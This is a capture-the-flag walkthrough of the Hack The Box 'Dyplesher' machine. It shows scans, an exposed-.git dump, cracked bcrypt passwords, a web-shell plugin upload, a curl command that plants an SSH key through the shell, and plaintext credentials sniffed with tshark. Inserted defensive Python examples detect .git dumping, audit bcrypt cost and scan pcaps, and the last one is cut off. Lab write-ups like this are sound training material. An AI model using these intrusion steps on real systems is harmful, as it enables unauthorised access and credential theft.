06/05/2021

Hackthebox Dyplesher Writeup – 10.10.10.190

Enumerations
MASSCAN and NMAP

root@kali:~/htb/boxes/dyplesher# masscan -i tun0 -p1-65535 --rate=1000 10.10.10.190

Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-06-10 14:32:59 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 5672/tcp on 10.10.10.190                                  
Discovered open port 25672/tcp on 10.10.10.190                                 
Discovered open port 25565/tcp on 10.10.10.190                                 
Discovered open port 3000/tcp on 10.10.10.190                                  
Discovered open port 22/tcp on 10.10.10.190                                    
Discovered open port 4369/tcp on 10.10.10.190                                  
Discovered open port 80/tcp on 10.10.10.190                                    
Discovered open port 11211/tcp on 10.10.10.190                                 
Discovered open port 25562/tcp on 10.10.10.190 

NMAP Service Scan

# Nmap 7.80 scan initiated Wed Jun 10 17:38:59 2020 as: nmap -p 5372,25672,25565,3000,22,4369,80,11211,25562 -sC -sV -oA nmap_out dyplesher.htb
Host: 10.10.10.190 (dyplesher.htb)
Ports: 
22/open/tcp//ssh//OpenSSH 8.0p1 Ubuntu 6build1
80/open/tcp//http//Apache httpd 2.4.1
3000/open/tcp//ppp
4369/open/tcp//epmd//Erlang Port Mapper Daemon
5372/filtered/tcp
11211/open/tcp//memcache
25562/open/tcp
25565/open/tcp//minecraft
25672/open/tcp
# Nmap done at Wed Jun 10 17:42:01 2020 -- 1 IP address (1 host up) scanned in 182.18 seconds


I can try the web service on port 80 (first adding “dyplesher.htb” to the hosts file).

root@kali:~/htb/boxes/dyplesher# cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	kali
10.10.10.190	dyplesher.htb

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

dyplesher.htb

The page reveals a new address, “test.dyplesher.htb”. We add this domain to the hosts file as well.

“test.dyplesher.htb” does not show anything useful on its own; maybe a rabbit hole.

I can use wfuzz to find other pages.

root@kali:~/htb/boxes/dyplesher# wfuzz -u http://test.dyplesher.htb/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt --hc 404,403 -c

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://test.dyplesher.htb/FUZZ
Total requests: 16245

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                                                                                           
===================================================================

000000001:   200        14 L     27 W     239 Ch      "index.php"                                                                                                                                       
000000366:   200        14 L     27 W     239 Ch      "."                                                                                                                                               
000001849:   301        9 L      28 W     323 Ch      ".git"  

root@kali:~/htb/boxes/dyplesher# wfuzz -u http://dyplesher.htb/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt --hc 404,403 -c

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://dyplesher.htb/FUZZ
Total requests: 16245

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                                                                                           
===================================================================

000000001:   200        123 L    241 W    4252 Ch     "index.php"                                                                                                                                       
000000102:   200        0 L      0 W      0 Ch        "favicon.ico"                                                                                                                                     
000000237:   200        2 L      3 W      24 Ch       "robots.txt"  

We find “test.dyplesher.htb/.git”. The directory listing is not accessible from the browser (403), but the individual files under it are, so I can use git-dumper.

root@kali:~/htb/boxes/dyplesher# git-dumper http://test.dyplesher.htb/.git test_dyp_git
[-] Testing http://test.dyplesher.htb/.git/HEAD [200]
[-] Testing http://test.dyplesher.htb/.git/ [403]
[-] Fetching common files
[-] Fetching http://test.dyplesher.htb/.git/COMMIT_EDITMSG [200]
[-] Fetching http://test.dyplesher.htb/.gitignore [404]
[-] Fetching http://test.dyplesher.htb/.git/description [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/applypatch-msg.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/commit-msg.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/post-commit.sample [404]
[-] Fetching http://test.dyplesher.htb/.git/hooks/post-receive.sample [404]
[-] Fetching http://test.dyplesher.htb/.git/hooks/post-update.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/pre-applypatch.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/pre-commit.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/pre-push.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/pre-receive.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/prepare-commit-msg.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/update.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/objects/info/packs [404]
[-] Fetching http://test.dyplesher.htb/.git/hooks/pre-rebase.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/index [200]
[-] Fetching http://test.dyplesher.htb/.git/info/exclude [200]
[-] Finding refs/
[-] Fetching http://test.dyplesher.htb/.git/FETCH_HEAD [404]
[-] Fetching http://test.dyplesher.htb/.git/HEAD [200]
[-] Fetching http://test.dyplesher.htb/.git/ORIG_HEAD [404]
[-] Fetching http://test.dyplesher.htb/.git/info/refs [404]
[-] Fetching http://test.dyplesher.htb/.git/config [200]
[-] Fetching http://test.dyplesher.htb/.git/logs/HEAD [200]
[-] Fetching http://test.dyplesher.htb/.git/logs/refs/heads/master [200]
[-] Fetching http://test.dyplesher.htb/.git/logs/refs/remotes/origin/HEAD [404]
[-] Fetching http://test.dyplesher.htb/.git/logs/refs/remotes/origin/master [200]
[-] Fetching http://test.dyplesher.htb/.git/logs/refs/stash [404]
[-] Fetching http://test.dyplesher.htb/.git/packed-refs [404]
[-] Fetching http://test.dyplesher.htb/.git/refs/heads/master [200]
[-] Fetching http://test.dyplesher.htb/.git/refs/remotes/origin/HEAD [404]
[-] Fetching http://test.dyplesher.htb/.git/refs/remotes/origin/master [200]
[-] Fetching http://test.dyplesher.htb/.git/refs/stash [404]
[-] Fetching http://test.dyplesher.htb/.git/refs/wip/wtree/refs/heads/master [404]
[-] Fetching http://test.dyplesher.htb/.git/refs/wip/index/refs/heads/master [404]
[-] Finding packs
[-] Finding objects
[-] Fetching objects
[-] Fetching http://test.dyplesher.htb/.git/objects/00/00000000000000000000000000000000000000 [404]
[-] Fetching http://test.dyplesher.htb/.git/objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391 [200]
[-] Fetching http://test.dyplesher.htb/.git/objects/b1/fe9eddcdf073dc45bb406d47cde1704f222388 [200]
[-] Fetching http://test.dyplesher.htb/.git/objects/27/29b565f353181a03b2e2edb030a0e2b33d9af0 [200]
[-] Fetching http://test.dyplesher.htb/.git/objects/3f/91e452f3cbfa322a3fbd516c5643a6ebffc433 [200]
[-] Running git checkout .

I downloaded the git files into the “test_dyp_git” folder.

root@kali:~/htb/boxes/dyplesher/test_dyp_git# ls -la
total 16
drwxr-xr-x 3 root root 4096 Jun 10 18:21 .
drwxr-xr-x 6 root root 4096 Jun 10 18:12 ..
drwxr-xr-x 7 root root 4096 Jun 10 18:12 .git
-rw-r--r-- 1 root root  513 Jun 10 18:12 index.php
-rw-r--r-- 1 root root    0 Jun 10 18:12 README.md
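The exposure above is easy to spot from the server side: every file git-dumper fetches shows up in the Apache access log as a burst of /.git/ requests from a single client. The following example is mine, added here and not part of the writeup or the box; it parses constructed combined-format log lines (the client IP, timestamps and paths are made up) and reports which repository files were actually served and which clients look like they were dumping the repository.

```python
import re
from collections import Counter, defaultdict
from typing import Dict, List, Optional

# Apache "combined" log format: client, ident, user, [time], "request", status, bytes, ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: \S+)?" (?P<status>\d{3}) \S+'
)

# Any path component named ".git" (the directory itself or anything below it).
GIT_PATH = re.compile(r"(^|/)\.git(/|$)")

# Files whose retrieval lets a client rebuild the repository: metadata first, then objects.
CRITICAL = ("/.git/HEAD", "/.git/config", "/.git/index", "/.git/objects/",
            "/.git/refs/", "/.git/logs/", "/.git/packed-refs")

# Constructed sample log lines modelled on a git-dumper run; not taken from the target.
SAMPLE_LOG = """\
10.10.14.2 - - [10/Jun/2020:18:12:01 +0000] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "python-requests/2.23.0"
10.10.14.2 - - [10/Jun/2020:18:12:01 +0000] "GET /.git/ HTTP/1.1" 403 278 "-" "python-requests/2.23.0"
10.10.14.2 - - [10/Jun/2020:18:12:02 +0000] "GET /.git/config HTTP/1.1" 200 92 "-" "python-requests/2.23.0"
10.10.14.2 - - [10/Jun/2020:18:12:02 +0000] "GET /.git/index HTTP/1.1" 200 209 "-" "python-requests/2.23.0"
10.10.14.2 - - [10/Jun/2020:18:12:03 +0000] "GET /.git/objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391 HTTP/1.1" 200 15 "-" "python-requests/2.23.0"
10.10.14.2 - - [10/Jun/2020:18:12:03 +0000] "GET /.git/packed-refs HTTP/1.1" 404 196 "-" "python-requests/2.23.0"
10.10.14.5 - - [10/Jun/2020:18:20:10 +0000] "GET /index.php HTTP/1.1" 200 239 "-" "Mozilla/5.0"
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def git_exposure_report(lines, dump_threshold: int = 3) -> Dict[str, object]:
    """Summarise .git traffic: what the server served (200) and who fetched many distinct paths."""
    served: List[str] = []                      # .git paths the server actually returned
    per_client: Counter = Counter()             # .git requests per client, any status
    distinct: Dict[str, set] = defaultdict(set)  # distinct .git paths per client
    for line in lines:
        rec = parse_line(line)
        if not rec or not GIT_PATH.search(rec["path"]):
            continue
        per_client[rec["client"]] += 1
        distinct[rec["client"]].add(rec["path"])
        if rec["status"] == "200":
            served.append(rec["path"])
    # A client touching several distinct .git paths is walking the repository, not browsing.
    suspected = sorted(c for c, paths in distinct.items() if len(paths) >= dump_threshold)
    # A 403 on /.git/ alone is not protection: the individual files still answered 200.
    exposed = any(p.startswith(CRITICAL) for p in served)
    return {
        "served": served,
        "requests_per_client": dict(per_client),
        "suspected_dumpers": suspected,
        "repository_exposed": exposed,
    }


if __name__ == "__main__":
    for key, value in git_exposure_report(SAMPLE_LOG.splitlines()).items():
        print(f"{key}: {value}")
```

The report distinguishes a blocked directory listing from a blocked repository: here the listing returns 403 while HEAD, config, index and an object all return 200, which is exactly the state git-dumper needs. On Apache 2.4 the exposure is closed with a <DirectoryMatch "^/.*/\.git/"> block containing Require all denied, or better, by deploying the checked-out tree without its .git directory at all.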

index.php

index.php contains memcached credentials, and the memcached service is listening on port 11211. I used the memcached-cli client tool to query it.

root@kali:~/htb/boxes/dyplesher# memcached-cli felamos:zxcvbnm@dyplesher.htb
dyplesher.htb> get username
MinatoTW
felamos
yuntao

dyplesher.htb> get password
$2a$10$5SAkMNF9fPNamlpWr.ikte0rHInGcU54tvazErpuwGPFePuI1DCJa
$2y$12$c3SrJLybUEOYmpu1RVrJZuPyzE5sxGeM0ZChDhl8MlczVrxiA3pQK
$2a$10$zXNCus.UXtiuJE5e6lsQGefnAH3zipl.FRNySz5C4RjitiwUoalS
Password cracking with John

root@kali:~/htb/boxes/dyplesher# john --wordlist=/usr/share/wordlists/rockyou.txt hash.memcached 
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (bcrypt [Blowfish 32/64 X3])
Remaining 1 password hash
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:38 0.06% (ETA: 12:02:46) 0g/s 272.6p/s 272.6c/s 272.6C/s bossy..jersey1
0g 0:00:01:43 0.16% (ETA: 12:11:32) 0g/s 271.6p/s 271.6c/s 271.6C/s 090586..nakata
0g 0:00:01:58 0.19% (ETA: 12:09:39) 0g/s 272.5p/s 272.5c/s 272.5C/s bheibhie..113085
Session aborted
root@kali:~/htb/boxes/dyplesher# john --show hash.memcached 

$2y$12$c3SrJLybUEOYmpu1RVrJZuPyzE5sxGeM0ZChDhl8MlczVrxiA3pQK:mommy1

1 password hash cracked, 1 left

http://dyplesher.htb:3000/ is running Gogs version 0.11.91.0811 (“A painless self-hosted Git service”). Register and log in with a newly created account. It is possible to enumerate the users' emails:

minatotw@dyplesher.htb
felamos@dyplesher.htb
yuntao@dyplesher.htb

We find two repositories, gitlab.git and memcached.git. Now clone them.

root@kali:~/htb/boxes/dyplesher# git clone http://dyplesher.htb:3000/felamos/gitlab.git
Cloning into 'gitlab'...
Username for 'http://dyplesher.htb:3000': felamos@dyplesher.htb
Password for 'http://felamos@dyplesher.htb@dyplesher.htb:3000': 
remote: Enumerating objects: 3, done.
remote: Counting objects: 100% (3/3), done.
remote: Total 3 (delta 0), reused 0 (delta 0)
Unpacking objects: 100% (3/3), 227 bytes | 227.00 KiB/s, done.

root@kali:~/htb/boxes/dyplesher# cd gitlab/
root@kali:~/htb/boxes/dyplesher/gitlab# ls
README.md
root@kali:~/htb/boxes/dyplesher/gitlab# cat README.md 
# gitlab
Gitlab backup
root@kali:~/htb/boxes/dyplesher/gitlab# 
root@kali:~/htb/boxes/dyplesher# git clone http://dyplesher.htb:3000/felamos/memcached.git
Cloning into 'memcached'...
Username for 'http://dyplesher.htb:3000': felamos@dyplesher.htb
Password for 'http://felamos@dyplesher.htb@dyplesher.htb:3000': 
remote: Enumerating objects: 4, done.
remote: Counting objects: 100% (4/4), done.
remote: Compressing objects: 100% (3/3), done.
remote: Total 4 (delta 0), reused 0 (delta 0)
Unpacking objects: 100% (4/4), 559 bytes | 559.00 KiB/s, done.

Enumerating the cloned files, I don't see anything special. I have felamos's password, so let's log in to Gogs as felamos and look at his repositories.

In felamos's repository I downloaded repo.zip.
root@kali:~/htb/boxes/dyplesher/repos/repositories# ls -R
.:
@hashed

./@hashed:
4b  4e  6b  d4

./@hashed/4b:
22

./@hashed/4b/22:
4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle

./@hashed/4e:
07

./@hashed/4e/07:
4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce
4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce.bundle

./@hashed/4e/07/4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce:

./@hashed/6b:
86

./@hashed/6b/86:
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.bundle

./@hashed/d4:
73

./@hashed/d4/73:
d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35.bundle

I moved all the bundle files into the bundle_files folder; git can clone a bundle file directly with git clone <name>.bundle.

root@kali:~/htb/boxes/dyplesher/bundle_unpack# cat clone.sh 

git clone 4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle
git clone 4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce.bundle
git clone 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.bundle
git clone d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35.bundle

root@kali:~/htb/boxes/dyplesher/bundle_unpack# chmod +x clone.sh 

root@kali:~/htb/boxes/dyplesher/bundle_unpack# ./clone.sh 
Cloning into '4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a'...
Receiving objects: 100% (39/39), 10.46 KiB | 10.46 MiB/s, done.
Resolving deltas: 100% (12/12), done.
Cloning into '4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce'...
Receiving objects: 100% (51/51), 20.94 MiB | 59.55 MiB/s, done.
Resolving deltas: 100% (5/5), done.
Cloning into '6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b'...
Receiving objects: 100% (85/85), 30.69 KiB | 10.23 MiB/s, done.
Resolving deltas: 100% (40/40), done.
Cloning into 'd4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35'...
Receiving objects: 100% (21/21), 16.98 KiB | 16.98 MiB/s, done.
Resolving deltas: 100% (9/9), done.

The bundles are cloned. Now let's search through the cloned files.

root@kali:~/htb/boxes/dyplesher/bundle_unpack# ls -R

./4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a:
LICENSE  README.md  src

./4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a/src:
VoteListener.py

./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce:
banned-ips.json      commands.yml         help.yml         plugins    sc-mqtt.jar        start.command   world
banned-players.json  craftbukkit-1.8.jar  ops.json         python     server.properties  usercache.json  world_the_end
bukkit.yml           eula.txt             permissions.yml  README.md  spigot-1.8.jar     whitelist.json

./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/plugins:
LoginSecurity  LoginSecurity.jar  PluginMetrics

./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/plugins/LoginSecurity:
authList  config.yml  users.db

./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/plugins/PluginMetrics:
config.yml

./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/python:
pythonMqtt.py

./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/world:
data  level.dat  level.dat_mcr  level.dat_old  playerdata  region  session.lock  uid.dat

./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/world/data:
villages.dat  villages_end.dat

./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/world/playerdata:
18fb40a5-c8d3-4f24-9bb8-a689914fcac3.dat

./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/world/region:
r.0.0.mca  r.-1.0.mca

./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/world_the_end:
DIM1  level.dat  level.dat_old  session.lock  uid.dat

./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/world_the_end/DIM1:
region

./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/world_the_end/DIM1/region:
r.0.0.mca  r.0.-1.mca  r.-1.0.mca  r.-1.-1.mca

./6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b:
LICENSE  phpbash.min.php  phpbash.php  README.md

./d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35:
LICENSE.txt  nightminer.py  README.md

There are a lot of files. One interesting one among them is users.db:

root@kali:~/htb/boxes/dyplesher/bundle_unpack# find -name *.db
./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/plugins/LoginSecurity/users.db

It contains a bcrypt password hash.

Cracking the bcrypt hash with John:

root@kali:~/htb/boxes/dyplesher/bundle_unpack# cat user_db.hash 
$2a$10$IRgHi7pBhb9K0QBQBOzOju0PyOZhBnK4yaWjeZYdeP6oyDvCo9vc6

root@kali:~/htb/boxes/dyplesher/bundle_unpack# john --wordlist=/usr/share/wordlists/rockyou.txt user_db.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
alexis1          (?)
1g 0:00:00:05 DONE (2020-06-10 20:49) 0.1675g/s 289.4p/s 289.4c/s 289.4C/s alexis1..argentina
Use the "--show" option to display all of the cracked passwords reliably
Session completed
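Both hash sets on this page, the three from memcached and the one from users.db, are bcrypt. The $2a$/$2y$ prefix is the variant, the two digits after it are the cost, and the "Cost 1 (iteration count) is 1024" that John prints is 2^10 for a cost of 10. The following example is mine, added here and not part of the writeup: it parses the page's hashes into their fields, flags any whose cost is below a chosen policy, and estimates how long one pass over a wordlist would take at the rate John reported above, so a defender can see what moving from cost 10 to cost 12 buys. The wordlist size of about 14.3 million lines for rockyou is an assumption.

```python
import re
from typing import Dict, List, NamedTuple

# bcrypt modular crypt format: $<variant>$<cost>$<22-char salt><31-char digest>,
# salt and digest in bcrypt's own base64 alphabet (./A-Za-z0-9).
BCRYPT_RE = re.compile(r"^\$(2[abxy]?)\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$")

# Hashes as they appear on this page: memcached "password" key, then LoginSecurity users.db.
PAGE_HASHES = [
    "$2a$10$5SAkMNF9fPNamlpWr.ikte0rHInGcU54tvazErpuwGPFePuI1DCJa",
    "$2y$12$c3SrJLybUEOYmpu1RVrJZuPyzE5sxGeM0ZChDhl8MlczVrxiA3pQK",
    "$2a$10$zXNCus.UXtiuJE5e6lsQGefnAH3zipl.FRNySz5C4RjitiwUoalS",
    "$2a$10$IRgHi7pBhb9K0QBQBOzOju0PyOZhBnK4yaWjeZYdeP6oyDvCo9vc6",
]


class BcryptInfo(NamedTuple):
    variant: str
    cost: int
    iterations: int   # 2**cost: the "iteration count" John reports
    salt: str
    digest: str


def parse_bcrypt(h: str) -> BcryptInfo:
    """Split a bcrypt string into its fields; raise ValueError if it is not well formed."""
    m = BCRYPT_RE.match(h)
    if not m:
        raise ValueError("not a well-formed bcrypt hash")
    variant, cost, salt, digest = m.groups()
    return BcryptInfo(variant, int(cost), 1 << int(cost), salt, digest)


def audit_hashes(hashes: List[str], min_cost: int = 12) -> List[Dict[str, object]]:
    """Classify each hash as ok, weak_cost (below policy) or malformed (cannot be parsed)."""
    report: List[Dict[str, object]] = []
    for h in hashes:
        try:
            info = parse_bcrypt(h)
        except ValueError:
            report.append({"hash": h, "status": "malformed"})
            continue
        status = "ok" if info.cost >= min_cost else "weak_cost"
        report.append({"hash": h, "status": status, "variant": info.variant,
                       "cost": info.cost, "iterations": info.iterations})
    return report


def wordlist_eta_seconds(words: int, cost: int, rate_at_cost10: float) -> float:
    """Seconds for one pass over `words` candidates, scaling a measured cost-10 rate by 2**(10-cost).
    Each +1 in cost doubles the work, so cost 12 is four times slower than cost 10."""
    rate = rate_at_cost10 * 2.0 ** (10 - cost)
    return words / rate


if __name__ == "__main__":
    for entry in audit_hashes(PAGE_HASHES):
        print(entry)
    ROCKYOU_LINES = 14_344_391          # assumed size of rockyou.txt
    JOHN_RATE_COST10 = 272.6            # c/s John reported above on 16 threads
    for cost in (10, 12, 14):
        hours = wordlist_eta_seconds(ROCKYOU_LINES, cost, JOHN_RATE_COST10) / 3600
        print(f"cost {cost}: one rockyou pass takes about {hours:.1f} h at this rate")
```

Note that the third memcached hash as printed on the page is one character short of a valid bcrypt string, so the audit reports it as malformed rather than guessing; a hash store that mixes $2a$ cost 10 and $2y$ cost 12 entries, as this one does, is a sign that password policy was never applied uniformly.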

Log in to “dyplesher.htb/login.php” with the credentials felamos@dyplesher.htb:alexis1.

That is a Minecraft server.

The Minecraft plugin upload works, so we build a plugin that includes a shell. Minecraft plugins are written in Java and can be built from external sources. I built the plugin with a web shell in Eclipse.
Reference link (Turkish): https://forum.gamer.com.tr/konu/dev-rehber-minecraft-icin-eklenti-nasil-yazilir-gelistirme-programlari-nelerdir-artik-siz-de-kolayca-eklenti-yazmaya-baslayabilirsiniz.445340/

The name you write here is the name you will type when reloading the plugin.
Delete the // section; it is only there as an example.

Upload dcr.jar on the plugin upload page.

This is important: fill in the Reload Plugin field with the name from plugin.yml.

We have a web shell, but ping, wget and curl do not work. So let's try installing an SSH key instead; this should work because we know the user name.

root@kali:~/htb/boxes/dyplesher# cat curl.sh 
#!/bin/bash

curl -G 'http://test.dyplesher.htb/dcr.php' --data-urlencode 'cmd=echo ssh-rsa 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 root@kali > /home/MinatoTW/.ssh/authorized_keys'

root@kali:~/htb/boxes/dyplesher# ./curl.sh 
root@kali:~/htb/boxes/dyplesher# ssh -i id_rsa MinatoTW@dyplesher.htb
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-46-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu 11 Jun 2020 07:17:35 AM UTC

  System load:  0.16              Processes:              247
  Usage of /:   6.8% of 97.93GB   Users logged in:        0
  Memory usage: 42%               IP address for ens33:   10.10.10.190
  Swap usage:   0%                IP address for docker0: 172.17.0.1


57 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable

Failed to connect to https://changelogs.ubuntu.com/meta-release. Check your Internet connection or proxy settings


Last login: Thu Jun 11 06:28:21 2020 from 10.10.14.2
MinatoTW@dyplesher:~$ id
uid=1001(MinatoTW) gid=1001(MinatoTW) groups=1001(MinatoTW),122(wireshark)
MinatoTW@dyplesher:~$ 

user.txt is not in this home directory.
We need the password of felamos or yuntao. Notably, the MinatoTW user is a member of the wireshark group, which means we can sniff traffic on this host. I used the tshark tool.

MinatoTW@dyplesher:~$ ip link show
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP mode DEFAULT group default qlen 1000
    link/ether 00:50:56:b9:5d:42 brd ff:ff:ff:ff:ff:ff
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DEFAULT group default 
    link/ether 02:42:19:48:30:e7 brd ff:ff:ff:ff:ff:ff
5: veth99ea606@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP mode DEFAULT group default 
    link/ether 3e:bb:99:af:06:62 brd ff:ff:ff:ff:ff:ff link-netnsid 0
MinatoTW@dyplesher:~$ 

MinatoTW@dyplesher:~$ tshark -i lo -F pcap -w captured_dcr.pcap
Capturing on 'Loopback: lo'
628 ^C

root@kali:~/htb/boxes/dyplesher# scp -i id_rsa MinatoTW@dyplesher.htb:captured_dcr.pcap /root/htb/boxes/dyplesher/captured_dcr.pcap  

We retrieved the capture with scp. Let's examine it and see what we find.

We found four different login names and passwords. Let's start with felamos.

“name”:”MinatoTW”,”email”:”MinatoTW@dyplesher.htb“,”password”:”bihys1amFov
“name”:”yuntao”,”email”:”yuntao@dyplesher.htb“,”password”:”wagthAw4ob
“name”:”felamos”,”email”:”felamos@dyplesher.htb“,”password”:”tieb0graQueg
yuntao:EashAnicOc3Op
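The credentials above were recovered simply by reading loopback traffic, which is why membership in the wireshark group is effectively a credential-disclosure privilege on a host whose internal services speak plaintext. A defender can run the same kind of scan as a control, to find services that pass secrets unencrypted before someone else does. The example below is mine, added here and not part of the writeup: it builds a small pcap in memory from constructed Ethernet/IPv4/TCP frames (the classic format tshark -F pcap writes), walks the records with the standard library only, and reports flows carrying a JSON "password" field or an HTTP Basic header, with the secret masked. All addresses, ports and credentials in it are constructed.

```python
import base64
import re
import struct
from typing import Dict, Iterator, List, Tuple

ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP = 6
PCAP_MAGIC_LE = 0xA1B2C3D4
PCAP_MAGIC_BE = 0xD4C3B2A1


def _ip4(addr: str) -> bytes:
    return bytes(int(octet) for octet in addr.split("."))


def build_tcp_pcap(flows: List[Tuple[str, int, str, int, bytes]]) -> bytes:
    """Write a minimal little-endian pcap (link type 1 = Ethernet) with one
    Ethernet/IPv4/TCP record per (src, sport, dst, dport, payload) tuple.
    IP/TCP checksums are left at zero: this is constructed test data, not wire traffic."""
    out = bytearray(struct.pack("<IHHiIII", PCAP_MAGIC_LE, 2, 4, 0, 0, 65535, 1))
    for i, (src, sport, dst, dport, payload) in enumerate(flows):
        tcp = struct.pack("!HHIIBBHHH", sport, dport, 1000 + i, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
        ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), i, 0, 64,
                         IPPROTO_TCP, 0, _ip4(src), _ip4(dst)) + tcp
        frame = b"\x00" * 12 + struct.pack("!H", ETHERTYPE_IPV4) + ip
        out += struct.pack("<IIII", 1591865692 + i, 0, len(frame), len(frame)) + frame
    return bytes(out)


def tcp_payloads(pcap: bytes) -> Iterator[Tuple[str, int, str, int, bytes]]:
    """Yield (src, sport, dst, dport, payload) for every Ethernet/IPv4/TCP record with data."""
    magic = struct.unpack("<I", pcap[:4])[0]
    if magic == PCAP_MAGIC_LE:
        endian = "<"
    elif magic == PCAP_MAGIC_BE:
        endian = ">"
    else:
        raise ValueError("not a classic pcap file (pcapng is not handled here)")
    if struct.unpack(endian + "I", pcap[20:24])[0] != 1:
        raise ValueError("only link type 1 (Ethernet) is handled here")
    off = 24
    while off + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack(endian + "IIII", pcap[off:off + 16])
        frame = pcap[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
            continue
        ihl = (frame[14] & 0x0F) * 4                       # IPv4 header length in bytes
        total_len = struct.unpack("!H", frame[16:18])[0]
        if frame[23] != IPPROTO_TCP:
            continue
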